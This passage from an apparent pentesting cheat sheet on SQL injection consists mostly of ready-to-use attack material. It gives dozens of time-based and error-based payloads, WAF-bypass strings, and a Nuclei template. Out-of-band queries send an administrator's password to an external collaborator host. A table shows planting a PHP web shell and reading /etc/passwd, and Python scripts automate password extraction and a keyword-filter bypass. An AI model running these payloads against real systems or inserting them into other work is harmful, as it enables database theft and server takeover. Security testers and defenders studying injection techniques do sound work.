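            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(ask, pos):
    """Binary search over printable ASCII with the page's '> char' test: 7 queries per character."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"SUBSTR({SECRET}, {pos}, 1) > char({mid})"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract(ask, length=None):
    """Recover the secret through whichever oracle is supplied."""
    if length is None:
        length = find_length(ask)
    return "".join(find_char(ask, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    conn = build_db()
    print("boolean channel:", extract(boolean_oracle(conn)))
    print("time channel   :", extract(time_oracle(conn)))
```

Only `ask` changes between channels; an error-based oracle (the `CASE WHEN ... THEN 1/0` trick later on this page) would simply catch the exception and return `True`. The comparison is a binary (byte) collation here, so upper- and lower-case letters land on different code points; on a MySQL column with a case-insensitive collation, compare `ASCII()`/`ORD()` values instead of strings.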

{% embed url="<https://bountysecurity.ai/blogs/news/optimizing-time-based-sql-injection-detection>" %}

```
+(select*from(select(sleep(20)))a)+
```

```
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
```

```
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
(SELECT * FROM (SELECT(SLEEP(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"*/
```

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/sqli_blind_time-based.txt>" %}

```
/?query="OR 1=1;--"&val1=ZGlkbnQgZXZlbiByZWFk&val2=aHR0cHM6Ly95b3V0dS5iZS9kUXc0dzlXZ1hjUQ%3D%3D&SLEEP(420)
```

{% embed url="<https://twitter.com/_mostwanted002_/status/1781940055507980782?s=03&t=Lxc1XmCXIFDZSKvL7PDyJQ>" %}

{% embed url="<https://www.sqlinjection.net/time-based/>" %}

{% embed url="<https://beaglesecurity.com/blog/vulnerability/time-based-blind-sql-injection.html>" %}

### Nuclei Template

```yaml
id: time-based-sqli
info:
  name: Time-Based Blind SQL Injection
  author: github.com/rzizah
  severity: Critical
  description: Detects time-based blind SQL injection vulnerability
http:
  - method: GET
    path:
        - "{{BaseURL}}" 
    payloads:
      injection:
      - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
      - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
      - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
      - "if(now()=sysdate(),SLEEP(7),0)"
      - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
      - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
            - "{{injection}}"
    stop-at-first-match: true
    matchers:
     - type: dsl
       dsl:
       - "status_code == 200"
       - "duration>=7 && duration <=16"
       condition: and
```

Source: <https://github.com/rzizah/private-nuclei-template/blob/main/bsqli-time-based.yaml>

### WAF Bypass - Cloudflare

```
(select(0)from(select(sleep(10)))v) → 403 Forbidden

Try:

(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
```

### Time Based SQLi in HTTP Headers

{% embed url="<https://github.com/danialhalo/SqliSniper>" %}

{% content-ref url="http-header-exploitation" %}
[http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation)
{% endcontent-ref %}

### CustomBSQLi - LostSec

{% embed url="<https://github.com/coffinxp/customBsqli>" %}

### OAST (out-of-band) Blind SQLi

PostgreSQL (`COPY ... TO PROGRAM` needs superuser or the `pg_execute_server_program` role):

```
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
```

{% embed url="<https://medium.com/@pranshux0x/super-blind-sql-injection-20000-bounty-thousands-of-targets-still-vulnerable-f9b013765448>" %}

MS SQL Server

```
'; exec master..xp_dirtree '//random.burpcollaborator.net/a'--
```

Data exfiltration

```
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.random.burpcollaborator.net/a"')--
```

Oracle DB

```
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
```

## Numeric SQL Injection

{% embed url="<https://www.sqlinjection.net/numeric-parameters/>" %}

## Wildcard SQL injection - LIKE clause

```
http://www.example.com/userphoto.php?name=a%
http://www.example.com/userphoto.php?name=b%
http://www.example.com/userphoto.php?name=c%

http://www.example.com/fruit.php?name=ap%
```

The server filtered the `%` wildcard, but the `_` character was permitted

```
http://www.example.com/admin/privado.php?sessionid=0_________
http://www.example.com/admin/privado.php?sessionid=1_________
http://www.example.com/admin/privado.php?sessionid=2_________
```

{% embed url="<https://www.pentester.es/like-sqli/>" %}

{% embed url="<https://labs.portcullis.co.uk/download/DoS_Attacks_Using_SQL_Wildcards.pdf>" %}

## Error-based SQL injection

{% embed url="<https://github.com/eslam3kl/SQLiDetector>" %}

### Conditional Error

```
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
```

The second input causes a divide-by-zero error while the first does not, so the presence of the error becomes the boolean channel:

```
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a
```

Oracle DB

```
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
```

Password Length

```
'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F262khXSwEEmbw0GLoBvr%2Fimage.png?alt=media&#x26;token=d86c7902-49d6-49ea-866a-3b8bd1113ff6" alt=""><figcaption></figcaption></figure>

Password value

```
'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F2eOkCiJH8QkLqipe4E9J%2Fimage.png?alt=media&#x26;token=5792f53c-a3c8-4d20-b0e9-87aa28b9819b" alt=""><figcaption></figcaption></figure>

```
'||(SELECT CASE WHEN SUBSTR(password,1,2)='da' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FTdwZfv5raPXfJkCeoCcr%2Fimage.png?alt=media&#x26;token=fa89b8a5-eb65-4260-b1a6-586836a1a291" alt=""><figcaption></figcaption></figure>

Etc.
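The loop implied by the payloads above, as an added example that is not part of the original page: a Python script that drives the conditional-error oracle until the whole password is recovered. The target is a constructed in-memory SQLite database standing in for the lab; because SQLite returns NULL for `1/0` instead of raising, a hypothetical `div_zero()` function is registered to play the part of Oracle's `TO_CHAR(1/0)`, and the "500 on database error" behaviour of the application is simulated in `vulnerable_endpoint`. It goes beyond the page's one-character-at-a-time guesses by binary-searching each position with `>` comparisons, which is how the `SUBSTRING(Password, 1, 1) > 'm'` form from the MS SQL payload is meant to be used.

```python
import sqlite3
import string

# Constructed stand-in for the target database: the page's users table plus the
# table the injectable query actually reads from.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users(username TEXT, password TEXT)")
_db.execute("INSERT INTO users VALUES ('administrator', 's3cr3tpw')")
_db.execute("CREATE TABLE tracking(id TEXT)")
_db.execute("INSERT INTO tracking VALUES ('abc')")


def _div_zero():
    """Hypothetical stand-in for Oracle's TO_CHAR(1/0). A Python UDF is used because
    SQLite yields NULL for 1/0; CASE evaluates its branches lazily, so the error
    only fires when the WHEN condition is true."""
    return 1 // 0


_db.create_function("div_zero", 0, _div_zero)


def vulnerable_endpoint(tracking_id: str) -> int:
    """Simulated application: input is concatenated into the query; a database
    error becomes an HTTP 500, anything else a 200. That difference is the oracle."""
    sql = "SELECT * FROM tracking WHERE id = '" + tracking_id + "'"
    try:
        _db.execute(sql).fetchall()
        return 200
    except sqlite3.Error:
        return 500


def condition_holds(condition: str) -> bool:
    """Wrap a boolean SQL condition in the page's '||(SELECT CASE ...)||' payload."""
    payload = ("'||(SELECT CASE WHEN " + condition + " THEN div_zero() ELSE '' END "
               "FROM users WHERE username='administrator')||'")
    return vulnerable_endpoint(payload) == 500


ALPHABET = string.digits + string.ascii_lowercase   # sorted by byte value, so '>' bisects it


def password_length(max_len: int = 64) -> int:
    """Same probe as the page's LENGTH(password)>1, stepped up until it fails."""
    for n in range(max_len + 1):
        if not condition_holds(f"LENGTH(password)>{n}"):
            return n
    raise RuntimeError("password longer than max_len")


def password_char(pos: int) -> str:
    """Binary search over ALPHABET using '>' comparisons: ~6 requests per position."""
    lo, hi = 0, len(ALPHABET) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if condition_holds(f"SUBSTR(password,{pos},1)>'{ALPHABET[mid]}'"):
            lo = mid + 1
        else:
            hi = mid
    guess = ALPHABET[lo]
    # Confirm with an equality probe so a character outside ALPHABET is noticed.
    if not condition_holds(f"SUBSTR(password,{pos},1)='{guess}'"):
        raise ValueError(f"character at position {pos} is outside ALPHABET")
    return guess


def extract_password() -> str:
    return "".join(password_char(i) for i in range(1, password_length() + 1))


if __name__ == "__main__":
    print(extract_password())
```

Against a real Oracle target replace `div_zero()` with `TO_CHAR(1/0)` and `SUBSTR`/`LENGTH` stay as they are; the equality check at the end of `password_char` is what turns a silent wrong guess (a character not in the alphabet) into an error you can act on.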

### Turn an otherwise blind SQL injection vulnerability into a visible one

```
CAST((SELECT example_column FROM example_table) AS int)
```

Casting the result to an incompatible type such as `int` makes the database raise an error that carries the value (PostgreSQL shown):

`ERROR: invalid input syntax for type integer: "Example data"`

```
' AND CAST((SELECT 1) AS int)--
```

```
# Username
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

# Password
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
```

## Fragmented SQL Injection - two endpoints

{% embed url="<https://www.invicti.com/blog/web-security/fragmented-sql-injection-attacks/>" %}

Consider an application where the single quote is blacklisted or escaped before the input reaches the query.

```
$username = "' or 1=1 --";
$password = "qwerty123456";
// . . .
$query = "SELECT * FROM users WHERE username='".$username."' AND password='".$password."'";

select * from users where username='\' or 1=1 -- ' and password='qwerty123456';
```

Because the single quote (') is escaped with a backslash, the payload does not work as the attacker intended: the whole username, `or 1=1 --` included, stays inside the string literal.

Splitting the payload across the two fields gets around the escaping. This works when the filter escapes quotes but leaves a bare backslash alone:

```
username: \
password: or 1 #

$query = "select * from users where username='".$username."' and password='".$password."'";

select * from users where username='\' and password=' or 1 # ';
```

The backslash escapes the quote that was meant to close the username literal, so the literal runs on until the quote after `password=`; the value compared against *username* becomes `' and password=` and the password check disappears from the query. What follows, `or 1`, is now parsed as SQL, so the condition is always true, and the `#` comments out the rest of the query including the dangling quote. The login check is bypassed.
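To make the mechanism checkable, here is an added Python example (not from the Invicti article or this page) that models a quote-only escaper, builds the two queries above, and runs them through a small MySQL-style literal scanner written for this example, so you can see exactly which characters the database would parse as SQL rather than as string content. `safe_login_rows` at the end is the fix, a parameterised query, run against a constructed in-memory SQLite table.

```python
import sqlite3


def escape_quotes_only(value: str) -> str:
    """Weak sanitiser from the text: escapes ' as backslash-quote but leaves a
    lone backslash untouched (unlike mysql_real_escape_string)."""
    return value.replace("'", "\\'")


def build_login_query(username: str, password: str) -> str:
    """Vulnerable pattern: each fragment escaped separately, then concatenated."""
    return ("SELECT * FROM users WHERE username='" + escape_quotes_only(username)
            + "' AND password='" + escape_quotes_only(password) + "'")


def code_outside_literals(sql: str) -> str:
    """Return the characters MySQL would parse as SQL code, dropping string
    literal content. Inside '...' a backslash escapes the next character and a
    doubled quote ('') is a literal quote; any other quote ends the literal."""
    out = []
    i, in_string = 0, False
    while i < len(sql):
        ch = sql[i]
        if not in_string:
            if ch == "'":
                in_string = True
            else:
                out.append(ch)
            i += 1
        elif ch == "\\" and i + 1 < len(sql):
            i += 2                      # escaped character stays inside the literal
        elif ch == "'" and sql[i + 1:i + 2] == "'":
            i += 2                      # '' inside a literal is a quote character
        elif ch == "'":
            in_string = False
            i += 1
        else:
            i += 1
    return "".join(out)


def injected_sql(username: str, password: str) -> str:
    """What the two attacker-controlled fragments contribute to the parsed SQL."""
    return code_outside_literals(build_login_query(username, password))


def safe_login_rows(username: str, password: str) -> int:
    """The fix: a parameterised query, so input never becomes SQL text.
    Uses a throwaway SQLite database holding one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'qwerty123456')")
    rows = conn.execute("SELECT * FROM users WHERE username=? AND password=?",
                        (username, password)).fetchall()
    conn.close()
    return len(rows)


if __name__ == "__main__":
    print(injected_sql("' or 1=1 --", "x"))   # escaping holds: no 'or 1=1' outside a literal
    print(injected_sql("\\", "or 1 #"))       # 'or 1 #' is now SQL, password check gone
    print(safe_login_rows("\\", "or 1 #"))    # 0 rows with parameters
```

The scanner is deliberately narrow (MySQL-style escapes only); it is enough to show that the single-field payload never leaves its literal while the split payload does, which is the whole point of the technique.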

## Email SQL injection

{% content-ref url="email-injections" %}
[email-injections](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/email-injections)
{% endcontent-ref %}

## Bypass - WAF / Filters

{% content-ref url="waf-bypass" %}
[waf-bypass](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/waf-bypass)
{% endcontent-ref %}

{% embed url="<https://johnermac.github.io/notes/ewptx/sqlievasion/>" %}

{% embed url="<https://portswigger.net/support/sql-injection-bypassing-common-filters>" %}

{% embed url="<https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF>" %}

{% embed url="<https://fluidattacks.com/blog/sqli-manual-bypass/>" %}

{% embed url="<https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/>" %}

{% embed url="<https://anyxel.com/payloads/waf-bypass-sql-injection-payloads>" %}

* <https://gist.github.com/cyberheartmi9/b4a4ff0f691be6b5c866450563258e86>

### SQLMap - All in one

```
sqlmap -r req.txt --level=5 --risk=3 --dbms="mysql" --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor -p search
```

{% content-ref url="../tools/sqlmap" %}
[sqlmap](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/sqlmap)
{% endcontent-ref %}

### Bypass combo

```
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fws35tf9raexkckVVFZQS%2FGNP3ZmNXQAA1Et-.jpg?alt=media&#x26;token=025b98a0-d6b9-4e2c-b21f-4262cc6b7d6e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F1cFJ4rWB4TxovtuzAcuj%2FGNP3ZpOXkAEEyJw.jpg?alt=media&#x26;token=bf6017f5-c1b7-4c37-bb5f-17a28e7bf583" alt=""><figcaption></figcaption></figure>

### Imperva gzip bypass

{% embed url="<https://github.com/BishopFox/Imperva_gzip_WAF_Bypass>" %}

### No Space (%20) - bypass using whitespace alternatives

```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```

### No Whitespace - bypass using comments

```sql
?id=1/*comment*/and/**/1=1/**/--
```

### No Whitespace - bypass using parenthesis

```sql
?id=(1)and(1)=(1)--
```

### No Comma - bypass using OFFSET, FROM and JOIN

```sql
LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1)
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```

### Blacklist using keywords - bypass using uppercase/lowercase

```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```

### Blacklist using keywords case insensitive - bypass using an equivalent operator

```sql
AND   -> &&
OR    -> ||
=     -> LIKE,REGEXP, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING
```

### Information\_schema.tables alternative

```sql
select * from mysql.innodb_table_stats;
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| database_name  | table_name            | last_update         | n_rows | clustered_index_size | sum_of_other_index_sizes |
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| dvwa           | guestbook             | 2017-01-19 21:02:57 |      0 |                    1 |                        0 |
| dvwa           | users                 | 2017-01-19 21:03:07 |      5 |                    1 |                        0 |
...
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+

mysql> show tables in dvwa;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
```

### Version alternative

```sql
mysql> select @@innodb_version;
+------------------+
| @@innodb_version |
+------------------+
| 5.6.31           |
+------------------+

mysql> select @@version;
+-------------------------+
| @@version               |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+

mysql> select version();
+-------------------------+
| version()               |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
```

Source:

{% embed url="<https://anyxel.com/payloads/waf-bypass-sql-injection-payloads>" %}

## Reading / Writing Files

{% embed url="<https://sqlwiki.netspi.com/attackQueries/readingAndWritingFiles/#mysql>" %}

{% hint style="info" %}
Requires a user with the FILE privilege; on recent MySQL versions `secure_file_priv` restricts these operations to one directory or disables them entirely.
{% endhint %}

| Description          | Query                                                                                                                                                                                                |
| -------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Dump to file         | `SELECT * FROM mytable INTO DUMPFILE '/tmp/somefile'`                                                                                                                                                |
| Dump PHP shell       | `SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/shell.php'`                                                                                                                           |
| Read file            | `SELECT LOAD_FILE('/etc/passwd')`                                                                                                                                                                    |
| Read file obfuscated | `SELECT LOAD_FILE(0x633A5C626F6F742E696E69)` (hex-encoded path, reads `c:\boot.ini`)                                                                                                                 |
| File privileges      | `SELECT file_priv FROM mysql.user WHERE user = 'netspi'`<br>`SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee LIKE '%netspi%'`          |

## XML-based SQL Injection

An XML character reference encodes the `S` of `SELECT`, so a keyword filter inspecting the raw body does not see the keyword, while the application's XML parser decodes it before the value reaches the query:

```
<stockCheck>
    <productId>123</productId>
    <storeId>999 &#x53;ELECT * FROM information_schema.tables</storeId>
</stockCheck>
```

With Hackvertor (Burp extension): select the payload, right-click > Extensions > Hackvertor > Encode > Hex Entities

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FqW0dLEjrIJ6HtLj5wHIe%2Fimage.png?alt=media&#x26;token=5cc10cad-6c5f-4132-a9d7-dc6574d739ef" alt=""><figcaption></figcaption></figure>

```
<stockCheck><productId>1</productId><storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users</@hex_entities></storeId></stockCheck>
```
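An added Python example (not from the page) that shows why the encoding works: a hypothetical keyword WAF matches on the raw request body, while the application's XML parser decodes the character references first, so the query receives the plain `SELECT`. `hex_entities` applies the same transform as Hackvertor's `<@hex_entities>` tag; the stockCheck document is the one from the page.

```python
import re
import xml.etree.ElementTree as ET

# Hypothetical signature-style WAF rule: keyword match on the raw body only.
SQL_KEYWORDS = re.compile(r"\b(SELECT|UNION|INSERT|UPDATE|DELETE)\b", re.IGNORECASE)


def hex_entities(text: str) -> str:
    """Encode every character as an XML hexadecimal character reference (&#xNN;)."""
    return "".join(f"&#x{ord(c):X};" for c in text)


def naive_waf_blocks(raw_body: str) -> bool:
    """True when the raw (undecoded) body trips the keyword rule."""
    return SQL_KEYWORDS.search(raw_body) is not None


def stock_check_body(store_id_value: str) -> str:
    """Build the page's stockCheck document with the given storeId content."""
    return ("<stockCheck><productId>123</productId>"
            f"<storeId>{store_id_value}</storeId></stockCheck>")


def store_id_seen_by_app(raw_body: str) -> str:
    """What the application reads after its XML parser decodes character references."""
    return ET.fromstring(raw_body).findtext("storeId")


def bypasses_keyword_filter(payload: str) -> bool:
    """Encoded body passes the WAF and still decodes to the original payload."""
    body = stock_check_body(hex_entities(payload))
    return not naive_waf_blocks(body) and store_id_seen_by_app(body) == payload


if __name__ == "__main__":
    p = "999 SELECT * FROM information_schema.tables"
    print(naive_waf_blocks(stock_check_body(p)))          # blocked as-is
    print(bypasses_keyword_filter(p))                     # passes once entity-encoded
```

The fix on the defending side is to run the same check the application will see, i.e. after XML decoding, rather than on the wire bytes; that is also why encoding only the one letter, as in the page's `&#x53;ELECT`, is already enough against a rule like this one.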

## Polyglots SQLi

{% embed url="<https://nastystereo.com/security/sqli-polyglots.html>" %}

## Resources

{% embed url="<https://www.yeswehack.com/fr/learn-bug-bounty/vulnerability-vectors-sql-injection>" %}

{% embed url="<https://portswigger.net/web-security/sql-injection>" %}

{% embed url="<https://tib3rius.com/sqli>" %}

{% embed url="<https://portswigger.net/web-security/sql-injection/cheat-sheet>" %}

{% embed url="<https://owasp.org/www-community/attacks/SQL_Injection>" %}

{% embed url="<https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html>" %}

{% embed url="<https://docs.veracode.com/r/injection-attacks#what-is-a-sql-injection-attack>" %}

{% embed url="<https://community.veracode.com/s/article/How-to-fix-CWE-89-SQL-Injection-flaws>" %}

{% embed url="<https://www.intigriti.com/hackademy/sql-injection>" %}

## Payload

{% embed url="<https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt>" %}

{% embed url="<https://github.com/payloadbox/sql-injection-payload-list>" %}

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection>" %}

## Tools

{% content-ref url="../tools/sqlmap" %}
[sqlmap](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/sqlmap)
{% endcontent-ref %}

Scanner for **time-based SQL injection (SQLi):**

{% embed url="<https://github.com/c1phy/sqltimer>" %}

{% embed url="<https://github.com/yuvraj112233/sqligo>" %}

{% embed url="<https://github.com/malvads/sqlmc>" %}

```
sqlmc  -u https://example.com
sqlmc -u http://testphp.vulnweb.com/listproducts.php?cat=1 -d 2 -t 10
```

{% embed url="<https://github.com/danialhalo/SqliSniper>" %}
SqliSniper
{% endembed %}

{% embed url="<https://github.com/eslam3kl/SQLiDetector>" %}

{% embed url="<https://github.com/r0oth3x49/ghauri>" %}
ghauri
{% endembed %}

{% embed url="<https://github.com/HexShad0w/Sh1dowQLI?s=03>" %}

{% embed url="<https://github.com/americo/sqlifinder>" %}

{% embed url="<https://github.com/hahwul/dalfox>" %}

{% embed url="<https://github.com/blackhatethicalhacking/SQLMutant>" %}

{% embed url="<https://github.com/ron190/jsql-injection?tab=readme-ov-file>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FtT3srZzbUxV8iN6zjNrl%2Fimage.png?alt=media&#x26;token=962e4759-e8b9-4e26-b998-6df524fdfaf8" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

